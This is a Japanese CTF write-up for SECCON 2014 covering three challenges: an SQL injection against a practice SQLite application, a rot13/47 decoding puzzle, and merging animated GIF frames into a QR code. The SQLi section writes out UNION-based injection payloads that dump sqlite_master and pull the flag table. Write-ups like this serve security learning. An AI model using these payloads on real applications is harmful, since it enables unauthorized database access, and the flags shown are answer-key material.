箱庭SQLi

dotbundle???みたいな謎な感じだったけどDB.dllとかなんか同梱してるし
sqliteとかそういう系かな〜と当たりをつけてそのまま

とりあえず5行だとUNIONしてもエラーでない

' and 1=0 UNION ALL SELECT null,null,null,null,null --

' and 1=0 UNION ALL SELECT type,name,sql,null,null FROM sqlite_master --

sqlite_masterからsql取り出して見てみるとSECCONってテーブルがあった

' and 1=0 UNION ALL SELECT FLAG,null,null,null,null FROM SECCON--

FLAG{EnjoySQLi}

decode me

FRPPBA 2014 ÓúêááòÓýÓ°ÓùÓäÓ¯ÓâÓÄÓúÓðÓþÐÒ
ebg13/47 ÓúäÓø¦ÓÞÓ÷ÓþýÝï¡ÓöÓèÐÒ
Ò¿Ò¼Ò·ÔâÔ¯ÔÄÔøÓöãùòàÓúÔöÔâÐëÔøÓöÓÜÓ¼ÓâÓ÷ÓúÓ³äÓø¦ÓÜÓ¯ÓæÓîÓÚÐØ
Ó÷ÓÓÓÕÓÀÓàÓöÐÑÓÙÓ²ÓöÓ÷ÓÕÓãÓåÓÓÓ¯ÓèÐÙ
Ô¦ÔºÔßÓþ÷íâ¢à¢îÅùçêËÓúù¢ãèÓæÓõÓÚÓºõÏýþÓæÓõÓÞÓïÓäÓÓÐÒ
ÒõÒûÒðÒöСÒ÷Ò²ÒÇÒ¶ÐÐÒ·ÒÆÒ¿ÐÐÒ¤ÒôÒòÒòÒþÒýÒáÒßÒàÒãТ

FRPPBAでぐぐるとrot13っぽい
rot13すると

rot13/47

とかでるので

nkf -r encoded.txt 

SECCON 2014 に参加のみなさまこんにちは。
rot13/47 に気付くとは流石です。
ｎｋｆコマンドで簡単にデコードできることにも気付きましたか？
というわけで、おめでとうございます！
フラグは半角英数文字に変換してから入力してください。
ＦＬＡＧ｛Ｈａｖｅ　ｆｕｎ　ＳＥＣＣＯＮ２０１４｝

FLAG{Have fun SECCON2014}

重ねてみよう

チームメイトが解いてたのですが、一応別の解き方のため書いておく
白い点が動くアニメーションgif
とりあえず重ねることに

convert +adjoin afterimage.gif before.gif
ls -1 before* |sort| awk -F- '{system(cmd_exec "convert -transparent black before-"$2" after-"$2);}'
cp after-0.gif marge.gif
ls -1 after-* |sort |awk '{system(cmd_exec "convert "$1" marge.gif -composite marge.gif")}'
convert marge.gif -background black -flatten  -alpha off marge.gif 
convert marge.gif -negate marge.gif
open marge.gif

1行目:gifアニメをbefore-*.gifへ分解
2行目:before-*.gifに対して黒色を透過処理したafter-*.gifを作成
3行目:after-0.gifをmarge.gifにコピー
4行目:marge.gifへafter-*.gifを一つづつ合成
5行目:このままだと黒色が透過してるので、黒色で背景を上書き
6行目:これだと白黒反転しているので元に戻す
7行目:開いたmarge.gifをQRコードリーダーで読むと
FLAG{Many dot makes a QR code}